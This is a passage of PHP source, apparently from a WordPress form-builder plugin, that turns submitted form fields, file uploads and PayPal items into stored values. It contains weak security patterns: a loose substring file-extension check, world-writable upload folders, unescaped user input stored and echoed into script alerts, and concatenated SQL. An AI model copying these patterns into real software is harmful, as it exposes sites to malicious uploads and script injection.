				  $value = (isset($_POST['wdform_'.$i."_long".$id]) ? $_POST['wdform_'.$i."_long".$id] : "") . '***map***' . (isset($_POST['wdform_'.$i."_lat".$id]) ? $_POST['wdform_'.$i."_lat".$id] : "");
				  break;
				}
				case "type_date_fields": {
				  $value = (isset($_POST['wdform_'.$i."_day".$id]) ? $_POST['wdform_'.$i."_day".$id] : "") . '-' . (isset($_POST['wdform_'.$i."_month".$id]) ? $_POST['wdform_'.$i."_month".$id] : "") . '-' . (isset($_POST['wdform_'.$i."_year".$id]) ? $_POST['wdform_'.$i."_year".$id] : "");
				  break;
				}					
				case "type_time": {
				  $ss = isset($_POST['wdform_'.$i."_ss".$id]) ? $_POST['wdform_'.$i."_ss".$id] : NULL;
				  if(isset($ss)) {
					$value = (isset($_POST['wdform_'.$i."_hh".$id]) ? $_POST['wdform_'.$i."_hh".$id] : "") . ':' . (isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "") . ':' . (isset($_POST['wdform_'.$i."_ss".$id]) ? $_POST['wdform_'.$i."_ss".$id] : "");
				  }
				  else {
					$value = (isset($_POST['wdform_'.$i."_hh".$id]) ? $_POST['wdform_'.$i."_hh".$id] : "") . ':' . (isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : "");
				  }								
				  $am_pm = isset($_POST['wdform_'.$i."_am_pm".$id]) ? $_POST['wdform_'.$i."_am_pm".$id] : NULL;
				  if(isset($am_pm)) {
					$value = $value . ' ' . $am_pm;
				  }
				  break;
				}					
				case "type_phone": {
				  $value = (isset($_POST['wdform_'.$i."_element_first".$id]) ? $_POST['wdform_'.$i."_element_first".$id] : "") . ' ' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : "");							
				  break;
				}		
				case "type_name": {				
				 $element_title = isset($_POST['wdform_'.$i."_element_title".$id]) ? esc_html($_POST['wdform_'.$i."_element_title".$id]) : NULL;
				  $element_middle = isset($_POST['wdform_'.$i."_element_middle".$id]) ? esc_html($_POST['wdform_'.$i."_element_middle".$id]) : NULL;
				  if(isset($element_title) || isset($element_middle)) {
					$value = (isset($_POST['wdform_'.$i."_element_title".$id]) ? esc_html($_POST['wdform_'.$i."_element_title".$id]) : "") . '@@@' . (isset($_POST['wdform_'.$i."_element_first".$id]) ? esc_html($_POST['wdform_'.$i."_element_first".$id]) : "") . '@@@' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? esc_html($_POST['wdform_'.$i."_element_last".$id]) : "") . '@@@' . (isset($_POST['wdform_'.$i."_element_middle".$id]) ? esc_html($_POST['wdform_'.$i."_element_middle".$id]) : "");
				  }
				  else {
					$value = (isset($_POST['wdform_'.$i."_element_first".$id]) ? esc_html($_POST['wdform_'.$i."_element_first".$id]) : "") . '@@@' . (isset($_POST['wdform_'.$i."_element_last".$id]) ? esc_html($_POST['wdform_'.$i."_element_last".$id]) : "");
				  }
				  break;
				}		
				case "type_file_upload": {
				  $files = isset($_FILES['wdform_'.$i.'_file'.$id]) ? $_FILES['wdform_'.$i.'_file'.$id] : NULL;
				  foreach($files['name'] as $file_key => $file_name) {
					if($file_name) {
					  $untilupload = $form->form_fields;
					  $untilupload = substr($untilupload, strpos($untilupload,$i.'*:*id*:*type_file_upload'), -1);
					  $untilupload = substr($untilupload, 0, strpos($untilupload,'*:*new_field*:'));
					  $untilupload = explode('*:*w_field_label_pos*:*',$untilupload);
					  $untilupload = $untilupload[1];
					  $untilupload = explode('*:*w_destination*:*',$untilupload);
					  $destination = $untilupload[0];
					  $destination = str_replace(site_url() . '/', '', $destination);
					  $untilupload = $untilupload[1];
					  $untilupload = explode('*:*w_extension*:*',$untilupload);
					  $extension 	 = $untilupload[0];
					  $untilupload = $untilupload[1];
					  $untilupload = explode('*:*w_max_size*:*',$untilupload);
					  $max_size 	 = $untilupload[0];
					  $untilupload = $untilupload[1];
					  $fileName = $files['name'][$file_key];
					  $fileSize = $files['size'][$file_key];

					  if($fileSize > $max_size * 1024) {
						echo "<script> alert('" . addslashes(__('The file exceeds the allowed size of', 'form_maker')) . $max_size . " KB');</script>";
						return array($max+1);
					  }

					  $uploadedFileNameParts = explode('.',$fileName);
					  $uploadedFileExtension = array_pop($uploadedFileNameParts);
					  $to = strlen($fileName) - strlen($uploadedFileExtension) - 1;
					  
					  $fileNameFree = substr($fileName, 0, $to);
					  $invalidFileExts = explode(',', $extension);
					  $extOk = false;

					  foreach($invalidFileExts as $key => $valuee) {
						if(is_numeric(strpos(strtolower($valuee), strtolower($uploadedFileExtension)))) {
						  $extOk = true;
						}
					  }
					   
					  if ($extOk == false) {
						echo "<script> alert('" . addslashes(__('Sorry, you are not allowed to upload this type of file.', 'form_maker')) . "');</script>";
						return array($max+1);
					  }
					  
					  $fileTemp = $files['tmp_name'][$file_key];
					  $p = 1;
					  
					  if(!file_exists($destination))
						mkdir($destination , 0777);
					  if (file_exists($destination . "/" . $fileName)) {
						$fileName1 = $fileName;
						while (file_exists($destination . "/" . $fileName1)) {
						  $to = strlen($file_name) - strlen($uploadedFileExtension) - 1;
						  $fileName1 = substr($fileName, 0, $to) . '(' . $p . ').' . $uploadedFileExtension;
						//  $file['name'] = $fileName;
						  $p++;
						}
						$fileName = $fileName1;
					  }
                                          
                                        // for dropbox & google drive integration addons
                                          $check_both = 0;
					if($form->save_uploads == 0){
                                            if(defined('WD_FM_DBOX_INT') && is_plugin_active(constant('WD_FM_DBOX_INT'))){
                                                $enable = $wpdb->get_var("SELECT enable FROM " . $wpdb->prefix ."formmaker_dbox_int WHERE form_id=" . $form->id);
						if($enable == 1){
                                                    $selectable_upload = $wpdb->get_var("SELECT selectable_upload FROM " . $wpdb->prefix ."formmaker_dbox_int WHERE form_id=" . $form->id);

                                                    if((int)$selectable_upload == 1){
                                                        $temp_dir_dbox =  explode('\\', $fileTemp);
                                                        $temp_dir_dbox = implode('%%', $temp_dir_dbox);

                                                        $value.= $temp_dir_dbox . '*@@url@@*' . $fileName;
                                                    }
                                                    else{
                                                        $dlink_dbox = '<a href="'.add_query_arg(array('action' => 'WD_FM_DBOX_INT', 'addon_task' => 'upload_dbox_file', 'id' => $form->id), admin_url('admin-ajax.php')).'&dbox_file_name=' . $fileName . '&dbox_folder_name=/'.$form->title.'" >' . $fileName . '</a>';

                                                        $value.= $dlink_dbox;
                                                    }

                                                    $files['tmp_name'][$file_key]=$fileTemp;
                                                    $temp_file = array( "name" => $files['name'][$file_key], "type" => $files['type'][$file_key], "tmp_name" => $files['tmp_name'][$file_key]);
                                                }
                                                else
                                                    $check_both ++;
                                              
                                            }
                                            else
                                                $check_both ++;
                                            if(defined('WD_FM_GDRIVE_INT') && is_plugin_active(constant('WD_FM_GDRIVE_INT'))){
                                                $enable = $wpdb->get_var("SELECT enable FROM " . $wpdb->prefix ."formmaker_gdrive_int WHERE form_id=" . $form->id);
						if($enable == 1){
                                                    $selectable_upload = $wpdb->get_var("SELECT selectable_upload FROM " . $wpdb->prefix ."formmaker_gdrive_int WHERE form_id=" . $form->id);

                                                    if((int)$selectable_upload == 1){
                                                        $temp_dir_dbox =  explode('\\', $fileTemp);
                                                        $temp_dir_dbox = implode('%%', $temp_dir_dbox);
                                                        $value.= 'wdCloudAddon' . $temp_dir_dbox . '*@@url@@*' . $fileName . '*@@url@@*' . $files['type'][$file_key];
                                                    }
                                                    else{                                          
                                                        $dlink_dbox = '<a target="_blank" href="'.add_query_arg(array('action' => 'WD_FM_GDRIVE_INT', 'addon_task' => 'create_drive_link', 'id' => $form->id), admin_url('admin-ajax.php')).'&gdrive_file_name=' . $fileName . '&gdrive_folder_name='.$form->title.'" >' . $fileName . '</a>';                                                        
                                                        $value.= $dlink_dbox;
                                                    }

                                                    $files['tmp_name'][$file_key]=$fileTemp;
                                                    $temp_file = array( "name" => $files['name'][$file_key], "type" => $files['type'][$file_key], "tmp_name" => $files['tmp_name'][$file_key]);
                                                }
                                                else
                                                    $check_both ++;
                                              
                                            }
                                            else
                                                $check_both ++;
                                         
                                        }
//                                           
											if($check_both != 0){
                                                $value.= '';
                                                $files['tmp_name'][$file_key]=$fileTemp;
                                                $temp_file = array( "name" => $files['name'][$file_key], "type" => $files['type'][$file_key], "tmp_name" => $files['tmp_name'][$file_key]);
                                            }
                                            // dropbox and google drive integration addons
                                            if($form->save_uploads == 1){
                                                if(!move_uploaded_file($fileTemp, ABSPATH . $destination . '/' . $fileName)) {	
                                                    echo "<script> alert('" . addslashes(__('Error, file cannot be moved.', 'form_maker')) . "');</script>";
                                                    return array($max+1);
                                                }
                                                $value.= site_url() . '/' . $destination . '/' . $fileName . '*@@url@@*';
                                                $files['tmp_name'][$file_key]=$destination . "/" . $fileName;
                                                $temp_file = array( "name" => $files['name'][$file_key], "type" => $files['type'][$file_key], "tmp_name" => $files['tmp_name'][$file_key]);

                                            }
                                              array_push($all_files,$temp_file);
					}
				  }
				  break;
				}
				
				case 'type_address': {
				  $value = '*#*#*#';
				  $element = isset($_POST['wdform_'.$i."_street1".$id]) ? esc_html($_POST['wdform_'.$i."_street1".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }
				  
				  $element = isset($_POST['wdform_'.$i."_street2".$id]) ? esc_html($_POST['wdform_'.$i."_street2".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }
				  
				  $element = isset($_POST['wdform_'.$i."_city".$id]) ? esc_html($_POST['wdform_'.$i."_city".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }
				  
				  $element = isset($_POST['wdform_'.$i."_state".$id]) ? esc_html($_POST['wdform_'.$i."_state".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }
				  
				  $element = isset($_POST['wdform_'.$i."_postal".$id]) ? esc_html($_POST['wdform_'.$i."_postal".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }
				  
				  $element = isset($_POST['wdform_'.$i."_country".$id]) ? esc_html($_POST['wdform_'.$i."_country".$id]) : NULL;
				  if(isset($element)) {
					$value = $element;
					break;
				  }						
				  break;
				}
				
				case "type_hidden": {
				  $value = isset($_POST[$label_label[$key]]) ? esc_html($_POST[$label_label[$key]]) : "";
				  break;
				}
				
				case "type_radio": {
				  $element = isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : NULL;
				  if(isset($element)) {
					$value = $element;	
					break;
				  }						
				  $value = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "";
				  break;
				}
				
				case "type_checkbox": {
				  $start = -1;
				  $value = '';
				  for($j = 0; $j < 100; $j++) {						
					$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
					if(isset($element)) {
					  $start = $j;
					  break;
					}
				  }
					
				  $other_element_id = -1;
				  $is_other = isset($_POST['wdform_'.$i."_allow_other".$id]) ? $_POST['wdform_'.$i."_allow_other".$id] : "";
				  if($is_other == "yes") {
					$other_element_id = isset($_POST['wdform_'.$i."_allow_other_num".$id]) ? $_POST['wdform_'.$i."_allow_other_num".$id] : "";
				  }
				  
				  if($start != -1) {
					for($j = $start; $j < 100; $j++) {
					  $element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
					  if(isset($element)) {
						if($j == $other_element_id) {
						  $value = $value . (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : "") . '***br***';
						}
						else {								
						  $value = $value . (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : "") . '***br***';
						}
					  }
					}
				  }						
				  break;
				}
				
				case "type_paypal_price":	{
				  $value = isset($_POST['wdform_'.$i."_element_dollars".$id]) ? $_POST['wdform_'.$i."_element_dollars".$id] : 0;

				  $value = (int) preg_replace('/\D/', '', $value);
				  
				  if(isset($_POST['wdform_'.$i."_element_cents".$id])) {
					$value = $value . '.' . ( preg_replace('/\D/', '', $_POST['wdform_'.$i."_element_cents".$id]));
				  }
				  
				  $total += (float)($value);						
				  $paypal_option = array();

				  if($value != 0) {
					$quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : 1);
					array_push ($paypal['item_name'], $label_label[$key]);
					array_push ($paypal['quantity'], $quantity);
					array_push ($paypal['amount'], $value);
					$is_amount=true;
					array_push ($paypal['on_os'], $paypal_option);
				  }
				  $value = $value . $form_currency;
				  break;
				}
				
				case "type_paypal_select": {
				  if(isset($_POST['wdform_'.$i."_element_label".$id]) && $_POST['wdform_'.$i."_element".$id] !='') {
					$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
				  }
				  else {
					$value = '';
				  }
				  $quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : 1);
				  $total += (float)(isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : 0) * $quantity;
				  array_push ($paypal['item_name'], $label_label[$key] . ' ' . (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : ""));
				  array_push ($paypal['quantity'], $quantity);
				  array_push ($paypal['amount'], (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : ""));
				  if(isset($_POST['wdform_'.$i."_element".$id]) && $_POST['wdform_'.$i."_element".$id] != 0) {
					$is_amount=true;
				  }
				  $element_quantity = isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
				  if(isset($element_quantity) && $value != '') {
					$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : "") . ': ' . $_POST['wdform_'.$i."_element_quantity".$id] . '***quantity***';
				  }
				  $paypal_option = array();
				  $paypal_option['on'] = array();
				  $paypal_option['os'] = array();

				  for($k = 0; $k < 50; $k++) {
					$temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
					if(isset($temp_val) && $value != '') {
					  array_push ($paypal_option['on'], (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : ""));
					  array_push ($paypal_option['os'], (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : ""));
					  $value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : "") . '***property***';
					}
				  }
				  array_push ($paypal['on_os'], $paypal_option);
				  break;
				}
            
				case "type_paypal_radio": {
				  if(isset($_POST['wdform_'.$i."_element_label".$id])) {
					$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
				  }
				  else {
					$value = '';
				  }
				  $quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : 1);
				  $total += (float)(isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : 0) * $quantity;
				  array_push ($paypal['item_name'], $label_label[$key] . ' ' . (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : ""));
				  array_push ($paypal['quantity'], $quantity);
				  array_push ($paypal['amount'], (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : 0));
				  if(isset($_POST['wdform_'.$i."_element".$id]) && $_POST['wdform_'.$i."_element".$id] != 0) {
					$is_amount=true;
				  }
				  
				  $element_quantity = isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
				  if(isset($element_quantity) && $value != '') {
					$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : "") . ': ' . $_POST['wdform_'.$i."_element_quantity".$id] . '***quantity***';
				  }					
				  
				  $paypal_option = array();
				  $paypal_option['on'] = array();
				  $paypal_option['os'] = array();

				  for($k = 0; $k < 50; $k++) {
					$temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
					if(isset($temp_val) && $value != '') {
					  array_push ($paypal_option['on'], (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : ""));
					  array_push ($paypal_option['os'], $_POST['wdform_'.$i."_property".$id.$k]);
					  $value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $_POST['wdform_'.$i."_property".$id.$k] . '***property***';
					}
				  }
				  array_push ($paypal['on_os'], $paypal_option);
				  break;
				}

				case "type_paypal_shipping": {
				  if(isset($_POST['wdform_'.$i."_element_label".$id])) {
					$value = $_POST['wdform_'.$i."_element_label".$id] . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;
				  }
				  else {
					$value = '';
				  }
				  $value = (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : "") . ' - ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "") . $form_currency;						
				  $paypal['shipping'] = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "";
				  break;
				}

				case "type_paypal_checkbox": {
				  $start = -1;
				  $value = '';
				  for($j = 0; $j < 100; $j++) {						
					$element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
					if(isset($element)) {
					  $start = $j;
					  break;
					}
				  }
				  
				  $other_element_id = -1;
				  $is_other = isset($_POST['wdform_'.$i."_allow_other".$id]) ? $_POST['wdform_'.$i."_allow_other".$id] : "";
				  if($is_other == "yes") {
					$other_element_id = isset($_POST['wdform_'.$i."_allow_other_num".$id]) ? $_POST['wdform_'.$i."_allow_other_num".$id] : "";
				  }
				  
				  if($start != -1) {
					for($j = $start; $j < 100; $j++) {
					  $element = isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL;
					  if(isset($element)) {
						if($j == $other_element_id) {
						  $value = $value . (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : "") . '***br***';									
						}
						else {
						  $value = $value . (isset($_POST['wdform_'.$i."_element".$id.$j."_label"]) ? $_POST['wdform_'.$i."_element".$id.$j."_label"] : "") . ' - ' . (isset($_POST['wdform_'.$i."_element".$id.$j]) && $_POST['wdform_'.$i."_element".$id.$j] == '' ? '0' : (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : "")) . $form_currency . '***br***';
						  $quantity = ((isset($_POST['wdform_' . $i . "_element_quantity" . $id]) && ($_POST['wdform_' . $i . "_element_quantity" . $id] >= 1)) ? $_POST['wdform_'.$i . "_element_quantity" . $id] : 1);
						  $total += (float)(isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : 0) * (float)($quantity);
						  array_push ($paypal['item_name'], $label_label[$key] . ' ' . (isset($_POST['wdform_'.$i."_element".$id.$j."_label"]) ? $_POST['wdform_'.$i."_element".$id.$j."_label"] : ""));
						  array_push ($paypal['quantity'], $quantity);
						  array_push ($paypal['amount'], (isset($_POST['wdform_'.$i."_element".$id.$j]) ? ($_POST['wdform_'.$i."_element".$id.$j] == '' ? '0' : $_POST['wdform_'.$i."_element".$id.$j]) : ""));
						  if (isset($_POST['wdform_'.$i."_element".$id.$j]) && $_POST['wdform_'.$i."_element".$id.$j] != 0) {
							$is_amount = TRUE;
						  }
						  $paypal_option = array();
						  $paypal_option['on'] = array();
						  $paypal_option['os'] = array();

						  for($k = 0; $k < 50; $k++) {
							$temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
							if(isset($temp_val)) {
							  array_push ($paypal_option['on'], isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "");
							  array_push ($paypal_option['os'], $_POST['wdform_'.$i."_property".$id.$k]);
							}
						  }
						  array_push ($paypal['on_os'], $paypal_option);
						}
					  }
					}
					
					$element_quantity = isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
					if(isset($element_quantity)) {
					  $value .= (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : "") . ': ' . $_POST['wdform_'.$i."_element_quantity".$id] . '***quantity***';
					}
					for($k = 0; $k < 50; $k++) {
					  $temp_val = isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL;
					  if(isset($temp_val)) {
						$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id.$k]) ? $_POST['wdform_'.$i."_element_property_label".$id.$k] : "") . ': ' . $_POST['wdform_'.$i."_property".$id.$k] . '***property***';
					  }
					}							
				  }
				  break;
				}
				
				case "type_star_rating": {
				  if(isset($_POST['wdform_'.$i."_selected_star_amount".$id]) && $_POST['wdform_'.$i."_selected_star_amount".$id] == "") {
					$selected_star_amount = 0;
				  }
				  else {
					$selected_star_amount = isset($_POST['wdform_'.$i."_selected_star_amount".$id]) ? $_POST['wdform_'.$i."_selected_star_amount".$id] : 0;
				  }						
				  $value = $selected_star_amount . '/' . (isset($_POST['wdform_'.$i."_star_amount".$id]) ? $_POST['wdform_'.$i."_star_amount".$id] : "");
				  break;
				}
			  
				case "type_scale_rating": {
				  $value = (isset($_POST['wdform_'.$i."_scale_radio".$id]) ? $_POST['wdform_'.$i."_scale_radio".$id] : 0) . '/' . (isset($_POST['wdform_'.$i."_scale_amount".$id]) ? $_POST['wdform_'.$i."_scale_amount".$id] : "");
				  break;
				}
				
				case "type_spinner": {
				  $value = isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : "";
				  break;
				}
				
				case "type_slider": {
				  $value = isset($_POST['wdform_'.$i."_slider_value".$id]) ? $_POST['wdform_'.$i."_slider_value".$id] : "";
				  break;
				}
				
				case "type_range": {
				  $value = (isset($_POST['wdform_'.$i."_element".$id.'0']) ? $_POST['wdform_'.$i."_element".$id.'0'] : "") . '-' . (isset($_POST['wdform_'.$i."_element".$id.'1']) ? $_POST['wdform_'.$i."_element".$id.'1'] : "");
				  break;
				}
				
				case "type_grading": {
				  $value = "";
				  $items = explode(":", isset($_POST['wdform_'.$i."_hidden_item".$id]) ? $_POST['wdform_'.$i."_hidden_item".$id] : "");
				  for($k = 0; $k < sizeof($items) - 1; $k++) {
					$value .= (isset($_POST['wdform_'.$i."_element".$id.'_'.$k]) ? $_POST['wdform_'.$i."_element".$id.'_'.$k] : "") . ':';
				  }
				  $value .= (isset($_POST['wdform_'.$i."_hidden_item".$id]) ? $_POST['wdform_'.$i."_hidden_item".$id] : "") . '***grading***';				
				  break;
				}
				
				case "type_matrix": {
				  $rows_of_matrix = explode("***", isset($_POST['wdform_'.$i."_hidden_row".$id]) ? $_POST['wdform_'.$i."_hidden_row".$id] : "");
				  $rows_count = sizeof($rows_of_matrix) - 1;
				  $column_of_matrix = explode("***", isset($_POST['wdform_'.$i."_hidden_column".$id]) ? $_POST['wdform_'.$i."_hidden_column".$id] : "");
				  $columns_count = sizeof($column_of_matrix) - 1;						
				
				  if(isset($_POST['wdform_'.$i."_input_type".$id]) && $_POST['wdform_'.$i."_input_type".$id] == "radio") {
					$input_value = "";
					for($k = 1; $k <= $rows_count; $k++) {
					  $input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k]) ? $_POST['wdform_'.$i."_input_element".$id.$k] : 0) . "***";
					}
				  }
				  if(isset($_POST['wdform_'.$i."_input_type".$id]) && $_POST['wdform_'.$i."_input_type".$id] == "checkbox") {
					$input_value = "";							
					for($k = 1; $k <= $rows_count; $k++) {
					  for($j = 1; $j <= $columns_count; $j++) {
						$input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j] : 0)."***";
					  }
					}
				  }
				  
				  if(isset($_POST['wdform_'.$i."_input_type".$id]) && $_POST['wdform_'.$i."_input_type".$id] == "text") {
					$input_value = "";
					for($k = 1; $k <= $rows_count; $k++) {
					  for($j = 1; $j <= $columns_count; $j++) {
						$input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? esc_html($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) : "") . "***";
					  }
					}
				  }
				  
				  if(isset($_POST['wdform_'.$i."_input_type".$id]) && $_POST['wdform_'.$i."_input_type".$id] == "select") {
					$input_value = "";
					for($k = 1; $k <= $rows_count; $k++) {
					  for($j = 1; $j <= $columns_count; $j++) {
						$input_value .= (isset($_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j] : "") . "***";	
					  }
					}
				  }
				  
				  $value = $rows_count . (isset($_POST['wdform_'.$i."_hidden_row".$id]) ? $_POST['wdform_'.$i."_hidden_row".$id] : "") . '***' . $columns_count . (isset($_POST['wdform_'.$i."_hidden_column".$id]) ? $_POST['wdform_'.$i."_hidden_column".$id] : "") . '***' . (isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : "") . '***' . $input_value . '***matrix***';
				  break;
				}
				
			  }

			  if($type == "type_address") {
				if(	$value == '*#*#*#') {
				  continue;
				}
			  }
			  if($type == "type_text" or $type == "type_password" or $type == "type_textarea" or $type == "type_name" or $type == "type_submitter_mail" or $type == "type_number" or $type == "type_phone")
			  {					
				$untilupload = $form->form_fields;
				$untilupload = substr($untilupload, strpos($untilupload, $i.'*:*id*:*'.$type), -1);
				$untilupload = substr($untilupload, 0, strpos($untilupload, '*:*new_field*:'));
				$untilupload = explode('*:*w_required*:*', $untilupload);
				$untilupload = $untilupload[1];
				$untilupload = explode('*:*w_unique*:*', $untilupload);
				$unique_element = $untilupload[0];
				if(strlen($unique_element)>3)
				$unique_element = substr($unique_element, -3);
			
				if($unique_element == 'yes') {						
				  $unique = $wpdb->get_col($wpdb->prepare("SELECT id FROM " . $wpdb->prefix . "formmaker_submits WHERE form_id= %d  and element_label= %s and element_value= %s", $id, $i, addslashes($value)));
				  if ($unique) {
					echo "<script> alert('" . addslashes(__('This field %s requires a unique entry and this value was already submitted.', 'form_maker')) . "'.replace('%s','" . $label_label[$key] . "'));</script>";
					return array($max + 1);
				  }
				}
			  }
			  $save_or_no = TRUE;
			  $fvals['{'.$i.'}']=str_replace(array("***map***", "*@@url@@*", "@@@@@@@@@", "@@@", "***grading***", "***br***"), array(" ", "", " ", " ", " ", ", "), addslashes($value));
			  if ($form->savedb) {
				$save_or_no = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
				  'form_id' => $id,
				  'element_label' => $i,
				  'element_value' => stripslashes($value),
				  'group_id' => ($max + 1),
				  'date' => date('Y-m-d H:i:s'),
				  'ip' => $_SERVER['REMOTE_ADDR'],
				  'user_id_wd' => $current_user->ID,
				), array(
				  '%d',
				  '%s',
				  '%s',
				  '%d',
				  '%s',
				  '%s',
				  '%d'
				));
				}
				if (!$save_or_no) {
					return FALSE;
				}
				$chgnac = FALSE;
			}
			else{
				$fvals['{'.$i.'}']='';
			}
		}
    }
    else {
      foreach ($label_type as $key => $type) {
        $value = '';
        if ($type == "type_submit_reset" or $type == "type_map" or $type == "type_editor" or  $type == "type_captcha" or $type == "type_arithmetic_captcha" or $type == "type_recaptcha" or  $type == "type_button" or $type=="type_paypal_total")
          continue;
        $i = $label_id[$key];
        if ($type != "type_address") {
          $deleted = isset($_POST[$i . "_type" . $id]) ? $_POST[$i . "_type" . $id] : NULL;
          if (!isset($deleted))
            break;
        }
        if ($type == 'type_paypal_total') {
          continue;
        }
        switch ($type) {
          case 'type_text':
          case 'type_password':
          case 'type_textarea':
          case "type_submitter_mail":
          case "type_date":
          case "type_own_select":
          case "type_country":
          case "type_number": {
            $value = isset($_POST[$i . "_element" . $id]) ? esc_html($_POST[$i . "_element" . $id]) : "";
            break;
          }
          case "type_mark_map": {
            $value = (isset($_POST[$i . "_long" . $id]) ? $_POST[$i . "_long" . $id] : "") . '***map***' . (isset($_POST[$i . "_lat" . $id]) ? $_POST[$i . "_lat" . $id] : "");
            break;
          }
          case "type_date_fields": {
            $value = (isset($_POST[$i . "_day" . $id]) ? $_POST[$i . "_day" . $id] : "") . '-' . (isset($_POST[$i . "_month" . $id]) ? $_POST[$i . "_month" . $id] : "") . '-' . (isset($_POST[$i . "_year" . $id]) ? $_POST[$i . "_year" . $id] : "");
            break;
          }
          case "type_time": {
            $ss = isset($_POST[$i . "_ss" . $id]) ? $_POST[$i . "_ss" . $id] : NULL;
